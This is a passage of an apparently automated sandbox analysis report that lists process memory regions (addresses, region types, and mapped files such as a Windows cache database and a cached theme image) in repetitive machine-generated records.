filename = "" Region: id = 22167 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22168 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22169 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22170 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22171 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22172 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22173 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22174 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22175 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22176 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22177 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22178 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22179 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22180 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22181 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22182 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22183 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22184 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 22185 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22186 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22187 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22188 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22189 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22190 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22191 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22192 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22193 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22194 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 22195 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22196 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22197 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22198 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22199 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22200 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22201 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22202 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22203 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22204 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22205 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22206 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22207 start_va = 0x570000 end_va = 0x573fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 22208 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 22209 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22210 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 22211 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 22212 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22213 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22214 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22215 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22216 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22217 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22218 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22219 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22220 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22221 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22222 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22223 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22224 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22225 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22226 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22227 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22228 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22229 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22230 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22231 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22232 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22233 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22234 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22235 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22236 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22237 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22238 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22239 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22240 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22241 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22242 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22243 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22244 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22245 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22246 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22247 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22248 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22249 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22250 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22251 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22252 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22253 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22254 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22255 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22256 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22257 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22258 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22259 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22260 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22261 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22262 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22263 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22264 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22265 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22266 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22267 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22268 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22269 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22270 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22271 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22272 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22273 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22274 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22275 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22276 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22277 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22278 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22279 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22280 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22281 start_va = 0x26d0000 end_va = 0x26e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 22282 start_va = 0xb4f0000 end_va = 0xb9e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4f0000" filename = "" Region: id = 22283 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22284 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22285 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22286 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22287 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22288 start_va = 0x2100000 end_va = 0x2103fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 22289 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22290 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22291 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22292 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22293 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22294 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22295 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22296 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22297 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22298 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22299 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22300 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22301 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22302 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22303 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22304 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22305 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22306 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22307 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22308 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22309 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22310 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22311 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22312 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22313 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22314 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22315 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22316 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22317 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22318 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22319 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22320 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22321 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22322 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22323 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22324 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22325 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22326 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22327 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22328 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22329 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22330 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22331 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22332 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22333 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22334 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22335 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22336 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22337 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22338 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22339 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22340 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22341 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22342 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22343 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22344 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22345 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22346 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22347 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22348 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22349 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22350 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22351 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22352 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22353 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22354 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22355 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22356 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22357 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22358 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22359 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22360 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22361 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = 